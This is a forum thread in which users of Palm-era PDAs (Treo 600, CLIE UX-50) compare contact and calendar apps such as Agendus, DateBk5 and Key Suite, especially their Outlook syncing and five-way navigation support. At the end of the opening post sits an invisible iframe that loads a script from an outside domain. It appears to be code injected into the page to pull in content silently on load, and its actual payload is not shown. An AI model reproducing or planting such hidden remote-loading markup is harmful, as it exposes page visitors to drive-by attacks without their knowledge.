+ Reply to Thread

Contact/Calendar Recommendations?

I'd like something with a bit more organizational features and some color (frankly) for these functions. I use Outlook in the office (but am versed in all the standards based mail & PIM stuff, too). I was looking at Agendus, 'cause I used to use another product from that company and liked it.

Before I go and load that (and possibly have to unload it) does anyone have a recommendation?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

DateBK5!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
    It is so good!
    It has over 250 enhancements over the Datebook that came with your phone.
    ~'kito
    pdaPhoneHome Moderator

I have been switching back and forth between Agendus and DateBk5 for a long time now. I have finally settled with Agendus because it has a cleaner interface. DateBk5 is a great app with a lot of functionality but it's a pain to make it work how you want it to.
    Amber. I'm finally converged, and lovin' it!

Originally posted by CLEAmber
    I have been switching back and forth between Agendus and DateBk5 for a long time now. I have finally settled with Agendus because it has a cleaner interface. DateBk5 is a great app with a lot of functionality but it's a pain to make it work how you want it to.
    Yo Amber!

I've been a DateBk5 user for a long time myself... but have been tempted to try Agendus because of all the great things I hear. One of the keys for me would be how well supported the 5-way navigation of the Treo 600 is. What device are you using Agendus on?
    Please visit my picture site: Robert-O-Rama :)

CLIE UX-50. I couldn't tell you whether the treo navigation is supported. It's a great program though, worth downloading the trial to see whether it works for you.

CLIE UX-50. I couldn't tell you whether the treo navigation is supported. It's a great program though, worth downloading the trial to see whether it works for you.
    Thanks. I might check it out... along with Key Contacts and Beyond Contacts. I need something with better Outlook support... but the 5-way nav support is important because I've gotten spoiled by no stylus operation on some of my favorite apps

Yeah, I could quickly get spoiled by that. Right now I use the tip of my finger more often than anything else

Just out of curiosity, why do you use multiple programs for contacts?

Just out of curiosity, why do you use multiple programs for contacts?
    I really don't use multiple apps... but I do want to evaluate the apps I listed (and I meant Key Suite, not Key Contacts), along with Agendus. It's hard to tell from the websites for each of those apps to what extent the Treo nav buttons are supported (they all claim some level of support... but often times it turns out not to be enough for stylus-free use). I was a big user of Key Contacts back when I had the Treo 300, because the jog-dial was well supported.

Right now I mostly use TAKEphONE for accessing my contacts. It's primarily a dialer app, but it also gives access to notes and other info. I don't really need something that shows appointments and tasks associated with a given contact. But I would like to see more of my Outlook data carried over to my PDA solution.

In all honesty I tend to prefer the built in datebook on the CLIE, only because it allows you to associate pics with your contacts. No other program has been able to support that yet, that I'm aware of. Agendus brings pretty much everything over from Outlook, which is why I like it. It is nice to be able to attach contacts to calls and appointments, even if you don't need to.